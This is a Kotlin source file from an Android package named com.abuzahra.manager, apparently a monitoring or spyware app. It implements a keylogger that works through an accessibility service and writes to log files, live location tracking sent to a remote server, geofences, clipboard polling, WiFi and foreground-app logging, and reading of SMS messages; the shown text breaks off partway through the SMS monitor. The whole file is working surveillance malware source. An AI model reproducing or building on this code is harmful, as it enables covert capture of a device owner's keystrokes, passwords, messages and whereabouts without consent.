     1→     1→package com.abuzahra.manager.executor
     2→     2→
     3→     3→import android.Manifest
     4→     4→import android.content.Context
     5→     5→import android.content.pm.PackageManager
     6→     6→import android.location.Location
     7→     7→import android.location.LocationListener
     8→     8→import android.location.LocationManager
     9→     9→import android.os.Build
    10→    10→import android.os.Bundle
    11→    11→import android.os.Looper
    12→    12→import android.provider.CallLog
    13→    13→import android.provider.Telephony
    14→    14→import android.util.Log
    15→    15→import androidx.core.app.ActivityCompat
    16→    16→import androidx.core.content.edit
    17→    17→import com.abuzahra.manager.App
    18→    18→import com.abuzahra.manager.api.ApiClient
    19→    19→import com.abuzahra.manager.service.MyAccessibilityService
    20→    20→import kotlinx.coroutines.CoroutineScope
    21→    21→import kotlinx.coroutines.Dispatchers
    22→    22→import kotlinx.coroutines.Job
    23→    23→import kotlinx.coroutines.delay
    24→    24→import kotlinx.coroutines.isActive
    25→    25→import kotlinx.coroutines.launch
    26→    26→import org.json.JSONArray
    27→    27→import org.json.JSONObject
    28→    28→import java.io.File
    29→    29→import java.text.SimpleDateFormat
    30→    30→import java.util.Date
    31→    31→import java.util.Locale
    32→    32→import java.util.concurrent.ConcurrentLinkedQueue
    33→    33→
    34→    34→/**
    35→    35→ * MonitorExecutor - Complete Implementation
    36→    36→ * Real monitoring functionality for keylogger, location tracking, clipboard, etc.
    37→    37→ */
    38→    38→object MonitorExecutor {
    39→    39→
    40→    40→    private const val TAG = "MonitorExecutor"
    41→    41→    private const val MAX_KEYLOG_SIZE = 100000
    42→    42→    private const val MAX_LOCATION_HISTORY = 500
    43→    43→    private const val MAX_CLIPBOARD_HISTORY = 100
    44→    44→    private const val MAX_NOTIFICATION_HISTORY = 500
    45→    45→
    46→    46→    // ===== MONITORING STATE =====
    47→    47→    private var keyloggerActive = false
    48→    48→    private var screenRecordingActive = false
    49→    49→    private var locationTrackingActive = false
    50→    50→    private var clipboardMonitorActive = false
    51→    51→    private var wifiMonitorActive = false
    52→    52→    private var appMonitorActive = false
    53→    53→    private var smsMonitorActive = false
    54→    54→    private var callMonitorActive = false
    55→    55→    private var notificationMonitorActive = false
    56→    56→
    57→    57→    // ===== DATA STORAGE =====
    58→    58→    private val keylogBuffer = ConcurrentLinkedQueue<KeylogEntry>()
    59→    59→    private val locationHistory = ConcurrentLinkedQueue<LocationEntry>()
    60→    60→    private val clipboardHistory = ConcurrentLinkedQueue<ClipboardEntry>()
    61→    61→    private val notificationHistory = ConcurrentLinkedQueue<NotificationEntry>()
    62→    62→    private val appUsageLog = ConcurrentLinkedQueue<AppUsageEntry>()
    63→    63→    private val geoFences = mutableListOf<GeoFence>()
    64→    64→    
    65→    65→    // ===== JOBS =====
    66→    66→    private var locationJob: Job? = null
    67→    67→    private var clipboardJob: Job? = null
    68→    68→    private var wifiJob: Job? = null
    69→    69→    private var appMonitorJob: Job? = null
    70→    70→    private var smsMonitorJob: Job? = null
    71→    71→    private var callMonitorJob: Job? = null
    72→    72→    
    73→    73→    // ===== LOCATION LISTENER =====
    74→    74→    private var locationListener: LocationListener? = null
    75→    75→
    76→    76→    // ===== DATA CLASSES =====
    77→    77→    data class KeylogEntry(
    78→    78→        val timestamp: Long,
    79→    79→        val packageName: String,
    80→    80→        val text: String,
    81→    81→        val viewType: String
    82→    82→    )
    83→    83→    
    84→    84→    data class LocationEntry(
    85→    85→        val timestamp: Long,
    86→    86→        val lat: Double,
    87→    87→        val lon: Double,
    88→    88→        val accuracy: Float,
    89→    89→        val speed: Float,
    90→    90→        val altitude: Double,
    91→    91→        val provider: String
    92→    92→    )
    93→    93→    
    94→    94→    data class ClipboardEntry(
    95→    95→        val timestamp: Long,
    96→    96→        val text: String,
    97→    97→        val sourcePackage: String?
    98→    98→    )
    99→    99→    
   100→   100→    data class NotificationEntry(
   101→   101→        val timestamp: Long,
   102→   102→        val packageName: String,
   103→   103→        val title: String?,
   104→   104→        val text: String?,
   105→   105→        val category: String?
   106→   106→    )
   107→   107→    
   108→   108→    data class AppUsageEntry(
   109→   109→        val timestamp: Long,
   110→   110→        val packageName: String,
   111→   111→        val eventType: String,
   112→   112→        val duration: Long
   113→   113→    )
   114→   114→    
   115→   115→    data class GeoFence(
   116→   116→        val id: String,
   117→   117→        val lat: Double,
   118→   118→        val lon: Double,
   119→   119→        val radius: Int,
   120→   120→        val active: Boolean,
   121→   121→        val name: String? = null
   122→   122→    )
   123→   123→
   124→   124→    // ===== KEYLOGGER =====
   125→   125→    fun keyloggerStart(): String {
   126→   126→        keyloggerActive = true
   127→   127→        val accessibility = MyAccessibilityService.getInstance()
   128→   128→        
   129→   129→        return if (accessibility != null) {
   130→   130→            MyAccessibilityService.setKeyloggerEnabled(true)
   131→   131→            "Keylogger started and connected to Accessibility Service"
   132→   132→        } else {
   133→   133→            "Keylogger started but Accessibility Service is not active. Enable it in Settings."
   134→   134→        }
   135→   135→    }
   136→   136→
   137→   137→    fun keyloggerStop(): String {
   138→   138→        keyloggerActive = false
   139→   139→        MyAccessibilityService.setKeyloggerEnabled(false)
   140→   140→        return "Keylogger stopped"
   141→   141→    }
   142→   142→
   143→   143→    fun getKeylogger(): Map<String, Any> {
   144→   144→        val entries = keylogBuffer.toList()
   145→   145→        val text = entries.joinToString("") { it.text }
   146→   146→        
   147→   147→        return mapOf(
   148→   148→            "active" to keyloggerActive,
   149→   149→            "count" to entries.size,
   150→   150→            "character_count" to text.length,
   151→   151→            "data" to text.takeLast(5000).ifBlank { "No data captured yet" },
   152→   152→            "entries" to entries.takeLast(50).map { 
   153→   153→                mapOf(
   154→   154→                    "time" to it.timestamp,
   155→   155→                    "app" to it.packageName,
   156→   156→                    "text" to it.text
   157→   157→                )
   158→   158→            },
   159→   159→            "accessibility_service" to (MyAccessibilityService.getInstance() != null)
   160→   160→        )
   161→   161→    }
   162→   162→    
   163→   163→    fun appendKeylog(packageName: String, text: String, viewType: String = "text") {
   164→   164→        if (keyloggerActive) {
   165→   165→            val entry = KeylogEntry(
   166→   166→                timestamp = System.currentTimeMillis(),
   167→   167→                packageName = packageName,
   168→   168→                text = text,
   169→   169→                viewType = viewType
   170→   170→            )
   171→   171→            keylogBuffer.add(entry)
   172→   172→            
   173→   173→            // Limit buffer size
   174→   174→            while (keylogBuffer.size > MAX_KEYLOG_SIZE) {
   175→   175→                keylogBuffer.poll()
   176→   176→            }
   177→   177→            
   178→   178→            // Save to file
   179→   179→            saveKeylogToFile(entry)
   180→   180→        }
   181→   181→    }
   182→   182→    
   183→   183→    private fun saveKeylogToFile(entry: KeylogEntry) {
   184→   184→        try {
   185→   185→            val file = File(App.instance.cacheDir, "keylog_${getDateString()}.log")
   186→   186→            val line = "${entry.timestamp}|${entry.packageName}|${entry.text}\n"
   187→   187→            file.appendText(line)
   188→   188→        } catch (e: Exception) {
   189→   189→            Log.e(TAG, "Failed to save keylog", e)
   190→   190→        }
   191→   191→    }
   192→   192→    
   193→   193→    fun getKeylogFiles(): List<File> {
   194→   194→        return App.instance.cacheDir.listFiles()
   195→   195→            ?.filter { it.name.startsWith("keylog_") && it.name.endsWith(".log") }
   196→   196→            ?.sortedByDescending { it.lastModified() }
   197→   197→            ?: emptyList()
   198→   198→    }
   199→   199→    
   200→   200→    fun clearKeylog(): String {
   201→   201→        keylogBuffer.clear()
   202→   202→        return "Keylog cleared"
   203→   203→    }
   204→   204→
   205→   205→    // ===== SCREEN RECORD =====
   206→   206→    fun screenRecordStart(context: Context, params: Map<String, Any> = emptyMap()): Map<String, Any> {
   207→   207→        screenRecordingActive = true
   208→   208→        Log.i(TAG, "Screen recording flag set. Screen recording requires MediaProjection permission.")
   209→   209→        // Attempt to delegate to ControlExecutor for actual recording
   210→   210→        return try {
   211→   211→            val result = ControlExecutor.startScreenRecording(context, params)
   212→   212→            mapOf(
   213→   213→                "monitor_flag" to true,
   214→   214→                "message" to "Screen recording started - delegated to ControlExecutor",
   215→   215→                "recording_result" to result
   216→   216→            )
   217→   217→        } catch (e: Exception) {
   218→   218→            Log.w(TAG, "ControlExecutor screen recording failed: ${e.message}")
   219→   219→            mapOf(
   220→   220→                "monitor_flag" to true,
   221→   221→                "message" to "Screen recording monitor activated. Use ControlExecutor.recordScreen() for actual MediaProjection-based recording.",
   222→   222→                "hint" to "Ensure screen capture permission has been granted via ScreenCaptureService.",
   223→   223→                "recording_result" to "delegation_failed"
   224→   224→            )
   225→   225→        }
   226→   226→    }
   227→   227→
   228→   228→    fun screenRecordStop(): String {
   229→   229→        screenRecordingActive = false
   230→   230→        return "Screen recording stopped"
   231→   231→    }
   232→   232→    
   233→   233→    fun isScreenRecordingActive(): Boolean = screenRecordingActive
   234→   234→
   235→   235→    // ===== LOCATION TRACKING =====
   236→   236→    fun locationLiveStart(context: Context, intervalSeconds: Int = 30): String {
   237→   237→        if (locationTrackingActive) {
   238→   238→            return "Location tracking already active"
   239→   239→        }
   240→   240→        
   241→   241→        if (ActivityCompat.checkSelfPermission(context, Manifest.permission.ACCESS_FINE_LOCATION) 
   242→   242→            != PackageManager.PERMISSION_GRANTED &&
   243→   243→            ActivityCompat.checkSelfPermission(context, Manifest.permission.ACCESS_COARSE_LOCATION) 
   244→   244→            != PackageManager.PERMISSION_GRANTED) {
   245→   245→            return "Location permission not granted"
   246→   246→        }
   247→   247→        
   248→   248→        locationTrackingActive = true
   249→   249→        val lm = context.getSystemService(Context.LOCATION_SERVICE) as LocationManager
   250→   250→        
   251→   251→        // Create location listener
   252→   252→        locationListener = object : LocationListener {
   253→   253→            override fun onLocationChanged(location: Location) {
   254→   254→                addLocationToHistory(
   255→   255→                    location.latitude,
   256→   256→                    location.longitude,
   257→   257→                    location.accuracy,
   258→   258→                    location.speed,
   259→   259→                    location.altitude,
   260→   260→                    location.provider ?: "unknown"
   261→   261→                )
   262→   262→                
   263→   263→                // Check geofences
   264→   264→                checkGeofences(location.latitude, location.longitude, context)
   265→   265→                
   266→   266→                // Send to server
   267→   267→                CoroutineScope(Dispatchers.IO).launch {
   268→   268→                    try {
   269→   269→                        ApiClient.sendLocation(
   270→   270→                            context,
   271→   271→                            location.latitude,
   272→   272→                            location.longitude,
   273→   273→                            location.accuracy
   274→   274→                        )
   275→   275→                    } catch (e: Exception) { Log.w(TAG, "sendLocation error", e) }
   276→   276→                }
   277→   277→            }
   278→   278→            
   279→   279→            override fun onStatusChanged(provider: String?, status: Int, extras: Bundle?) {}
   280→   280→            override fun onProviderEnabled(provider: String) {}
   281→   281→            override fun onProviderDisabled(provider: String) {}
   282→   282→        }
   283→   283→        
   284→   284→        // Request updates
   285→   285→        try {
   286→   286→            if (lm.isProviderEnabled(LocationManager.GPS_PROVIDER)) {
   287→   287→                lm.requestLocationUpdates(
   288→   288→                    LocationManager.GPS_PROVIDER,
   289→   289→                    (intervalSeconds * 1000).toLong(),
   290→   290→                    10f,
   291→   291→                    locationListener!!,
   292→   292→                    Looper.getMainLooper()
   293→   293→                )
   294→   294→            }
   295→   295→            
   296→   296→            if (lm.isProviderEnabled(LocationManager.NETWORK_PROVIDER)) {
   297→   297→                lm.requestLocationUpdates(
   298→   298→                    LocationManager.NETWORK_PROVIDER,
   299→   299→                    (intervalSeconds * 1000).toLong(),
   300→   300→                    10f,
   301→   301→                    locationListener!!,
   302→   302→                    Looper.getMainLooper()
   303→   303→                )
   304→   304→            }
   305→   305→            
   306→   306→            // Get last known location immediately
   307→   307→            val lastKnown = lm.getLastKnownLocation(LocationManager.GPS_PROVIDER)
   308→   308→                ?: lm.getLastKnownLocation(LocationManager.NETWORK_PROVIDER)
   309→   309→            
   310→   310→            if (lastKnown != null) {
   311→   311→                addLocationToHistory(
   312→   312→                    lastKnown.latitude,
   313→   313→                    lastKnown.longitude,
   314→   314→                    lastKnown.accuracy,
   315→   315→                    lastKnown.speed,
   316→   316→                    lastKnown.altitude,
   317→   317→                    lastKnown.provider ?: "unknown"
   318→   318→                )
   319→   319→            }
   320→   320→            
   321→   321→            return "Live location tracking started (interval: ${intervalSeconds}s)"
   322→   322→        } catch (e: Exception) {
   323→   323→            Log.e(TAG, "Location tracking start error", e)
   324→   324→            locationTrackingActive = false
   325→   325→            return "Error: ${e.message}"
   326→   326→        }
   327→   327→    }
   328→   328→
   329→   329→    fun locationStop(): String {
   330→   330→        locationTrackingActive = false
   331→   331→        locationListener?.let { listener ->
   332→   332→            try {
   333→   333→                val ctx = com.abuzahra.manager.App.instance
   334→   334→                val lm = ctx.getSystemService(Context.LOCATION_SERVICE) as android.location.LocationManager
   335→   335→                lm.removeUpdates(listener)
   336→   336→                Log.i(TAG, "Location listener unregistered")
   337→   337→            } catch (e: Exception) {
   338→   338→                Log.e(TAG, "Failed to remove location listener", e)
   339→   339→            }
   340→   340→        }
   341→   341→        locationListener = null
   342→   342→        locationJob?.cancel()
   343→   343→        locationJob = null
   344→   344→        return "Location tracking stopped"
   345→   345→    }
   346→   346→
   347→   347→    fun isLocationTrackingActive(): Boolean = locationTrackingActive
   348→   348→
   349→   349→    fun addLocationToHistory(lat: Double, lon: Double, accuracy: Float = 0f, speed: Float = 0f, altitude: Double = 0.0, provider: String = "unknown") {
   350→   350→        val entry = LocationEntry(
   351→   351→            timestamp = System.currentTimeMillis(),
   352→   352→            lat = lat,
   353→   353→            lon = lon,
   354→   354→            accuracy = accuracy,
   355→   355→            speed = speed,
   356→   356→            altitude = altitude,
   357→   357→            provider = provider
   358→   358→        )
   359→   359→        locationHistory.add(entry)
   360→   360→        
   361→   361→        // Limit history
   362→   362→        while (locationHistory.size > MAX_LOCATION_HISTORY) {
   363→   363→            locationHistory.poll()
   364→   364→        }
   365→   365→        
   366→   366→        // Save to file
   367→   367→        saveLocationToFile(entry)
   368→   368→    }
   369→   369→
   370→   370→    fun getLocationHistory(): List<Map<String, Any>> {
   371→   371→        return locationHistory.toList().map { entry ->
   372→   372→            mapOf(
   373→   373→                "timestamp" to entry.timestamp,
   374→   374→                "datetime" to formatTimestamp(entry.timestamp),
   375→   375→                "lat" to entry.lat,
   376→   376→                "lon" to entry.lon,
   377→   377→                "accuracy" to entry.accuracy,
   378→   378→                "speed" to entry.speed,
   379→   379→                "altitude" to entry.altitude,
   380→   380→                "provider" to entry.provider
   381→   381→            )
   382→   382→        }
   383→   383→    }
   384→   384→    
   385→   385→    private fun saveLocationToFile(entry: LocationEntry) {
   386→   386→        try {
   387→   387→            val file = File(App.instance.cacheDir, "locations_${getDateString()}.json")
   388→   388→            val json = JSONObject().apply {
   389→   389→                put("timestamp", entry.timestamp)
   390→   390→                put("lat", entry.lat)
   391→   391→                put("lon", entry.lon)
   392→   392→                put("accuracy", entry.accuracy)
   393→   393→                put("speed", entry.speed)
   394→   394→                put("altitude", entry.altitude)
   395→   395→                put("provider", entry.provider)
   396→   396→            }
   397→   397→            file.appendText(json.toString() + "\n")
   398→   398→        } catch (e: Exception) { Log.w(TAG, "saveLocationToFile error", e) }
   399→   399→    }
   400→   400→    
   401→   401→    fun clearLocationHistory(): String {
   402→   402→        locationHistory.clear()
   403→   403→        return "Location history cleared"
   404→   404→    }
   405→   405→
   406→   406→    // ===== GEO FENCING =====
   407→   407→    fun geoAdd(params: Map<String, Any>): String {
   408→   408→        val arg = params["arg"]?.toString() ?: ""
   409→   409→        val parts = arg.split(",")
   410→   410→        
   411→   411→        return if (parts.size >= 2) {
   412→   412→            val lat = parts[0].trim().toDoubleOrNull()
   413→   413→            val lon = parts[1].trim().toDoubleOrNull()
   414→   414→            val radius = parts.getOrNull(2)?.trim()?.toIntOrNull() ?: 500
   415→   415→            val name = parts.getOrNull(3)?.trim()
   416→   416→            
   417→   417→            if (lat != null && lon != null) {
   418→   418→                val fence = GeoFence(
   419→   419→                    id = java.util.UUID.randomUUID().toString(),
   420→   420→                    lat = lat,
   421→   421→                    lon = lon,
   422→   422→                    radius = radius,
   423→   423→                    active = true,
   424→   424→                    name = name
   425→   425→                )
   426→   426→                geoFences.add(fence)
   427→   427→                saveGeofences()
   428→   428→                "Geofence added: ${fence.id} at ($lat, $lon) radius ${radius}m"
   429→   429→            } else {
   430→   430→                "Invalid coordinates"
   431→   431→            }
   432→   432→        } else {
   433→   433→            "Usage: lat,lon,radius,name"
   434→   434→        }
   435→   435→    }
   436→   436→
   437→   437→    fun geoRemove(params: Map<String, Any>): String {
   438→   438→        val index = params["arg"]?.toString()?.toIntOrNull() ?: -1
   439→   439→        
   440→   440→        return if (index >= 0 && index < geoFences.size) {
   441→   441→            val removed = geoFences.removeAt(index)
   442→   442→            saveGeofences()
   443→   443→            "Geofence removed: ${removed.id}"
   444→   444→        } else {
   445→   445→            "Invalid index. Use 0-${geoFences.size - 1}"
   446→   446→        }
   447→   447→    }
   448→   448→
   449→   449→    fun geoList(): List<Map<String, Any>> {
   450→   450→        return geoFences.mapIndexed { index, fence ->
   451→   451→            mapOf(
   452→   452→                "index" to index,
   453→   453→                "id" to fence.id,
   454→   454→                "lat" to fence.lat,
   455→   455→                "lon" to fence.lon,
   456→   456→                "radius" to fence.radius,
   457→   457→                "active" to fence.active,
   458→   458→                "name" to (fence.name ?: "Unnamed")
   459→   459→            )
   460→   460→        }
   461→   461→    }
   462→   462→    
   463→   463→    fun geoToggle(params: Map<String, Any>): String {
   464→   464→        val index = params["arg"]?.toString()?.toIntOrNull() ?: -1
   465→   465→        
   466→   466→        return if (index >= 0 && index < geoFences.size) {
   467→   467→            geoFences[index] = geoFences[index].copy(active = !geoFences[index].active)
   468→   468→            saveGeofences()
   469→   469→            "Geofence ${if (geoFences[index].active) "enabled" else "disabled"}"
   470→   470→        } else {
   471→   471→            "Invalid index"
   472→   472→        }
   473→   473→    }
   474→   474→    
   475→   475→    private fun checkGeofences(lat: Double, lon: Double, context: Context) {
   476→   476→        for (fence in geoFences.filter { it.active }) {
   477→   477→            val distance = calculateDistance(lat, lon, fence.lat, fence.lon)
   478→   478→            
   479→   479→            if (distance <= fence.radius) {
   480→   480→                // Buffer event locally
   481→   481→                com.abuzahra.manager.EventBuffer.addEvent(
   482→   482→                    "geofence_entered",
   483→   483→                    mapOf(
   484→   484→                        "fence_id" to fence.id,
   485→   485→                        "fence_name" to (fence.name ?: "Unnamed"),
   486→   486→                        "distance" to distance
   487→   487→                    )
   488→   488→                )
   489→   489→            }
   490→   490→        }
   491→   491→    }
   492→   492→    
   493→   493→    private fun calculateDistance(lat1: Double, lon1: Double, lat2: Double, lon2: Double): Float {
   494→   494→        val results = FloatArray(1)
   495→   495→        Location.distanceBetween(lat1, lon1, lat2, lon2, results)
   496→   496→        return results[0]
   497→   497→    }
   498→   498→    
   499→   499→    private fun saveGeofences() {
   500→   500→        try {
   501→   501→            val prefs = App.instance.getSharedPreferences("monitor", Context.MODE_PRIVATE)
   502→   502→            val json = JSONArray(geoFences.map { fence ->
   503→   503→                JSONObject().apply {
   504→   504→                    put("id", fence.id)
   505→   505→                    put("lat", fence.lat)
   506→   506→                    put("lon", fence.lon)
   507→   507→                    put("radius", fence.radius)
   508→   508→                    put("active", fence.active)
   509→   509→                    put("name", fence.name)
   510→   510→                }
   511→   511→            })
   512→   512→            prefs.edit().putString("geofences", json.toString()).apply()
   513→   513→        } catch (e: Exception) { Log.w(TAG, "saveGeofences error", e) }
   514→   514→    }
   515→   515→    
   516→   516→    private fun loadGeofences() {
   517→   517→        try {
   518→   518→            val prefs = App.instance.getSharedPreferences("monitor", Context.MODE_PRIVATE)
   519→   519→            val jsonStr = prefs.getString("geofences", "[]") ?: "[]"
   520→   520→            val json = JSONArray(jsonStr)
   521→   521→            
   522→   522→            geoFences.clear()
   523→   523→            for (i in 0 until json.length()) {
   524→   524→                val obj = json.getJSONObject(i)
   525→   525→                geoFences.add(GeoFence(
   526→   526→                    id = obj.getString("id"),
   527→   527→                    lat = obj.getDouble("lat"),
   528→   528→                    lon = obj.getDouble("lon"),
   529→   529→                    radius = obj.getInt("radius"),
   530→   530→                    active = obj.getBoolean("active"),
   531→   531→                    name = obj.optString("name")
   532→   532→                ))
   533→   533→            }
   534→   534→        } catch (e: Exception) { Log.w(TAG, "loadGeofences error", e) }
   535→   535→    }
   536→   536→
   537→   537→    // ===== CLIPBOARD MONITOR =====
   538→   538→    fun clipboardMonitorStart(context: Context): String {
   539→   539→        if (clipboardMonitorActive) {
   540→   540→            return "Clipboard monitoring already active"
   541→   541→        }
   542→   542→        
   543→   543→        clipboardMonitorActive = true
   544→   544→        
   545→   545→        clipboardJob = CoroutineScope(Dispatchers.IO).launch {
   546→   546→            var lastClipboard = ""
   547→   547→            
   548→   548→            while (isActive && clipboardMonitorActive) {
   549→   549→                try {
   550→   550→                    val clipboard = context.getSystemService(Context.CLIPBOARD_SERVICE) as android.content.ClipboardManager
   551→   551→                    val clip = clipboard.primaryClip
   552→   552→                    
   553→   553→                    if (clip != null && clip.itemCount > 0) {
   554→   554→                        val text = clip.getItemAt(0).text?.toString() ?: ""
   555→   555→                        
   556→   556→                        if (text.isNotEmpty() && text != lastClipboard) {
   557→   557→                            lastClipboard = text
   558→   558→                            
   559→   559→                            val entry = ClipboardEntry(
   560→   560→                                timestamp = System.currentTimeMillis(),
   561→   561→                                text = text,
   562→   562→                                sourcePackage = clip.description?.label?.toString()
   563→   563→                            )
   564→   564→                            clipboardHistory.add(entry)
   565→   565→                            
   566→   566→                            while (clipboardHistory.size > MAX_CLIPBOARD_HISTORY) {
   567→   567→                                clipboardHistory.poll()
   568→   568→                            }
   569→   569→                            
   570→   570→                            // Buffer event locally
   571→   571→                            com.abuzahra.manager.EventBuffer.addEvent(
   572→   572→                                "clipboard_change",
   573→   573→                                mapOf("text" to text.take(500))
   574→   574→                            )
   575→   575→                        }
   576→   576→                    }
   577→   577→                    
   578→   578→                    delay(2000) // Check every 2 seconds
   579→   579→                } catch (e: Exception) {
   580→   580→                    Log.e(TAG, "Clipboard monitor error", e)
   581→   581→                    delay(5000)
   582→   582→                }
   583→   583→            }
   584→   584→        }
   585→   585→        
   586→   586→        return "Clipboard monitoring started"
   587→   587→    }
   588→   588→
   589→   589→    fun clipboardMonitorStop(): String {
   590→   590→        clipboardMonitorActive = false
   591→   591→        clipboardJob?.cancel()
   592→   592→        clipboardJob = null
   593→   593→        return "Clipboard monitoring stopped"
   594→   594→    }
   595→   595→
   596→   596→    fun isClipboardMonitorActive(): Boolean = clipboardMonitorActive
   597→   597→    
   598→   598→    fun getClipboardHistory(): List<Map<String, Any>> {
   599→   599→        return clipboardHistory.toList().map { entry ->
   600→   600→            mapOf(
   601→   601→                "timestamp" to entry.timestamp,
   602→   602→                "datetime" to formatTimestamp(entry.timestamp),
   603→   603→                "text" to entry.text,
   604→   604→                "source" to (entry.sourcePackage ?: "")
   605→   605→            )
   606→   606→        }
   607→   607→    }
   608→   608→    
   609→   609→    fun clearClipboardHistory(): String {
   610→   610→        clipboardHistory.clear()
   611→   611→        return "Clipboard history cleared"
   612→   612→    }
   613→   613→
   614→   614→    // ===== WIFI MONITOR =====
   615→   615→    fun wifiMonitorStart(context: Context): String {
   616→   616→        if (wifiMonitorActive) {
   617→   617→            return "WiFi monitoring already active"
   618→   618→        }
   619→   619→        
   620→   620→        wifiMonitorActive = true
   621→   621→        
   622→   622→        wifiJob = CoroutineScope(Dispatchers.IO).launch {
   623→   623→            var lastWifi = ""
   624→   624→            
   625→   625→            while (isActive && wifiMonitorActive) {
   626→   626→                try {
   627→   627→                    val wm = context.applicationContext.getSystemService(Context.WIFI_SERVICE) as android.net.wifi.WifiManager
   628→   628→                    
   629→   629→                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
   630→   630→                        if (ActivityCompat.checkSelfPermission(context, Manifest.permission.ACCESS_FINE_LOCATION) 
   631→   631→                            != PackageManager.PERMISSION_GRANTED) {
   632→   632→                            delay(30000)
   633→   633→                            continue
   634→   634→                        }
   635→   635→                    }
   636→   636→                    
   637→   637→                    val currentWifi = wm.connectionInfo
   638→   638→                    val ssid = currentWifi?.ssid?.toString() ?: "Not connected"
   639→   639→                    
   640→   640→                    if (ssid != lastWifi) {
   641→   641→                        lastWifi = ssid
   642→   642→                        
   643→   643→                        // Buffer event locally
   644→   644→                        com.abuzahra.manager.EventBuffer.addEvent(
   645→   645→                            "wifi_change",
   646→   646→                            mapOf("ssid" to ssid, "bssid" to (currentWifi?.bssid ?: ""))
   647→   647→                        )
   648→   648→                    }
   649→   649→                    
   650→   650→                    delay(30000) // Check every 30 seconds
   651→   651→                } catch (e: Exception) {
   652→   652→                    Log.e(TAG, "WiFi monitor error", e)
   653→   653→                    delay(60000)
   654→   654→                }
   655→   655→            }
   656→   656→        }
   657→   657→        
   658→   658→        return "WiFi monitoring started"
   659→   659→    }
   660→   660→
   661→   661→    fun wifiMonitorStop(): String {
   662→   662→        wifiMonitorActive = false
   663→   663→        wifiJob?.cancel()
   664→   664→        wifiJob = null
   665→   665→        return "WiFi monitoring stopped"
   666→   666→    }
   667→   667→
   668→   668→    fun isWifiMonitorActive(): Boolean = wifiMonitorActive
   669→   669→
   670→   670→    // ===== APP MONITOR =====
   671→   671→    fun appMonitorStart(context: Context): String {
   672→   672→        if (appMonitorActive) {
   673→   673→            return "App monitoring already active"
   674→   674→        }
   675→   675→        
   676→   676→        appMonitorActive = true
   677→   677→        
   678→   678→        appMonitorJob = CoroutineScope(Dispatchers.IO).launch {
   679→   679→            var lastApp = ""
   680→   680→            
   681→   681→            while (isActive && appMonitorActive) {
   682→   682→                try {
   683→   683→                    // Get foreground app using usage stats
   684→   684→                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP_MR1) {
   685→   685→                        if (ActivityCompat.checkSelfPermission(context, Manifest.permission.PACKAGE_USAGE_STATS) 
   686→   686→                            == PackageManager.PERMISSION_GRANTED) {
   687→   687→                            
   688→   688→                            val usageStatsManager = context.getSystemService(Context.USAGE_STATS_SERVICE) 
   689→   689→                                as android.app.usage.UsageStatsManager
   690→   690→                            
   691→   691→                            val endTime = System.currentTimeMillis()
   692→   692→                            val startTime = endTime - 60000
   693→   693→                            
   694→   694→                            val usageStats = usageStatsManager.queryUsageStats(
   695→   695→                                android.app.usage.UsageStatsManager.INTERVAL_DAILY,
   696→   696→                                startTime, endTime
   697→   697→                            )
   698→   698→                            
   699→   699→                            val foregroundApp = usageStats
   700→   700→                                .filter { it.lastTimeUsed > startTime }
   701→   701→                                .maxByOrNull { it.lastTimeUsed }
   702→   702→                                ?.packageName ?: ""
   703→   703→                            
   704→   704→                            if (foregroundApp.isNotEmpty() && foregroundApp != lastApp) {
   705→   705→                                lastApp = foregroundApp
   706→   706→                                
   707→   707→                                val entry = AppUsageEntry(
   708→   708→                                    timestamp = System.currentTimeMillis(),
   709→   709→                                    packageName = foregroundApp,
   710→   710→                                    eventType = "foreground",
   711→   711→                                    duration = 0
   712→   712→                                )
   713→   713→                                appUsageLog.add(entry)
   714→   714→                                
   715→   715→                                // Buffer event locally
   716→   716→                                com.abuzahra.manager.EventBuffer.addEvent(
   717→   717→                                    "app_change",
   718→   718→                                    mapOf("package" to foregroundApp)
   719→   719→                                )
   720→   720→                            }
   721→   721→                        }
   722→   722→                    }
   723→   723→                    
   724→   724→                    delay(5000) // Check every 5 seconds
   725→   725→                } catch (e: Exception) {
   726→   726→                    Log.e(TAG, "App monitor error", e)
   727→   727→                    delay(10000)
   728→   728→                }
   729→   729→            }
   730→   730→        }
   731→   731→        
   732→   732→        return "App monitoring started"
   733→   733→    }
   734→   734→
   735→   735→    fun appMonitorStop(): String {
   736→   736→        appMonitorActive = false
   737→   737→        appMonitorJob?.cancel()
   738→   738→        appMonitorJob = null
   739→   739→        return "App monitoring stopped"
   740→   740→    }
   741→   741→
   742→   742→    fun isAppMonitorActive(): Boolean = appMonitorActive
   743→   743→    
   744→   744→    fun getAppUsageLog(): List<Map<String, Any>> {
   745→   745→        return appUsageLog.toList().map { entry ->
   746→   746→            mapOf(
   747→   747→                "timestamp" to entry.timestamp,
   748→   748→                "datetime" to formatTimestamp(entry.timestamp),
   749→   749→                "package" to entry.packageName,
   750→   750→                "event" to entry.eventType,
   751→   751→                "duration" to entry.duration
   752→   752→            )
   753→   753→        }
   754→   754→    }
   755→   755→
   756→   756→    // ===== SMS MONITOR =====
   757→   757→    fun smsMonitorStart(context: Context): String {
   758→   758→        if (smsMonitorActive) {
   759→   759→            return "SMS monitoring already active"
   760→   760→        }
   761→   761→        
   762→   762→        smsMonitorActive = true
   763→   763→        
   764→   764→        smsMonitorJob = CoroutineScope(Dispatchers.IO).launch {
   765→   765→            var lastSmsId = 0L
   766→   766→            
   767→   767→            while (isActive && smsMonitorActive) {
   768→   768→                try {
   769→   769→                    if (ActivityCompat.checkSelfPermission(context, Manifest.permission.READ_SMS) 
   770→   770→                        == PackageManager.PERMISSION_GRANTED) {
   771→   771→                        
   772→   772→                        val uri = Telephony.Sms.CONTENT_URI
   773→   773→                        val projection = arrayOf(
   774→   774→                            Telephony.Sms._ID,
   775→   775→                            Telephony.Sms.ADDRESS,
   776→   776→                            Telephony.Sms.BODY,
   777→   777→                            Telephony.Sms.DATE,
   778→   778→                            Telephony.Sms.TYPE
   779→   779→                        )
   780→   780→                        
   781→   781→                        context.contentResolver.query(uri, projection, null, null, "${Telephony.Sms._ID} DESC")?.use { cursor ->
   782→   782→                            if (cursor.moveToFirst()) {
   783→   783→                                val id = cursor.getLong(0)
   784→   784→                                
   785→   785→                                if (id > lastSmsId) {
   786→   786→                                    lastSmsId = id
   787→   787→                                    
   788→   788→                                    val address = cursor.getString(1)
   789→   789→                                    val body = cursor.getString(2)
   790→   790→                                    val date = cursor.getLong(3)
   791→   791→                                    val type = cursor.getInt(4)
   792→   792→                                    
   793→   793→                                    // Buffer event locally
   794→   794→                                    com.abuzahra.manager.EventBuffer.addEvent(
   795→   795→                                        "sms_received",
